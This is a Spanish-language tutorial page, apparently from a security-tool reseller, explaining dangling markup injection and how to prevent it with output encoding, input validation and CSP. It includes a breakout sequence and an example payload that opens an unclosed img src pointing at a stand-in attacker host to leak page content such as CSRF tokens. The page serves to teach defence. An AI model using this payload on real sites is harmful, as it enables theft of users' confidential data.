¿Que es Dangling Markup Injection?

Dangling Markup Injection

En esta sección, explicaremos la Inyección de Marcado Colgante (Dangling Markup Injection), cómo funciona un exploit típico y cómo prevenir ataques de marcado colgante.

¿Qué es Dangling Markup Injection?

La inyección es una técnica para capturar datos entre dominios en situaciones en las que no es posible un ataque de secuencias de comandos entre sitios.

Supongamos que una aplicación incorpora datos controlables por el atacante en sus respuestas de una manera insegura:

				
					<input type="text" name="input" value="CONTROLLABLE DATA HERE
				
			

Supongamos también que la aplicación no filtra ni escapa los caracteres > ". Un atacante puede utilizar la siguiente sintaxis para salirse del valor del atributo entre comillas y de la etiqueta que lo encierra, y volver a un contexto HTML:

				
					">
				
			

Una solución de monitoreo de infraestructura extensible a nivel empresarial con funciones que ahorran tiempo y son fáciles de usar.

 

Conocer …

En esta situación, un atacante intentaría naturalmente realizar un ataque XSS . Pero supongamos que un ataque XSS normal no es posible debido a filtros de entrada, política de seguridad de contenido u otros obstáculos. En este caso, aún podría ser posible realizar un ataque de inyección dangling markup utilizando un payload como la siguiente:

				
					"><img src='//attacker-website.com?
				
			

Esta carga útil crea una img etiqueta y define el inicio de un src atributo que contiene una URL en el servidor del atacante. Tenga en cuenta que la carga útil del atacante no cierra el src atributo, que queda «pendiente». Cuando un navegador analiza la respuesta, buscará hacia delante hasta que encuentre una comilla simple para terminar el atributo. Todo lo que esté hasta ese carácter se tratará como parte de la URL y se enviará al servidor del atacante dentro de la cadena de consulta de la URL. Todos los caracteres no alfanuméricos, incluidas las nuevas líneas, se codificarán en la URL.

La consecuencia del ataque es que el atacante puede capturar parte de la respuesta de la aplicación después del punto de inyección, que puede contener datos confidenciales. Según la funcionalidad de la aplicación, esto puede incluir tokens CSRF, mensajes de correo electrónico o datos financieros.

Cualquier atributo que realice una solicitud externa se puede utilizar para marcado colgante.

El siguiente laboratorio es difícil de resolver porque todas las solicitudes externas están bloqueadas. Sin embargo, hay ciertas etiquetas que permiten almacenar datos y recuperarlos de un servidor externo más tarde. Para resolver este laboratorio, es posible que se requiera la interacción del usuario.

Escaneo DAST automatizado sin límites. Basado en la tecnología Burp en la que sus equipos de seguridad ya confían.

Conocer …

Cómo prevenir los ataques Dangling Markup

Puede prevenir ataques de dangling markup utilizando las mismas defensas generales para prevenir secuencias de comandos entre sitios, codificando los datos en la salida y validando la entrada en la llegada.

También puede mitigar algunos ataques de dangling markup mediante la política de seguridad de contenido ( CSP ). Por ejemplo, puede prevenir algunos ataques (pero no todos) mediante una política que impida que las etiquetas img carguen recursos externos.

NORTH NETWORKS es Distribuidor Oficial y brinda licencias nuevas, renovaciones y servicios profesionales de las herramientas mas importantes.

Pongase en contacto y le ayudaremos a analizar sus necesidades para poder brindarle la herramienta que mejor se ajuste a sus requerimientos.

Si te ha gustado, ¡compártelo con tus amigos!

Scroll al inicio

Portal de Clientes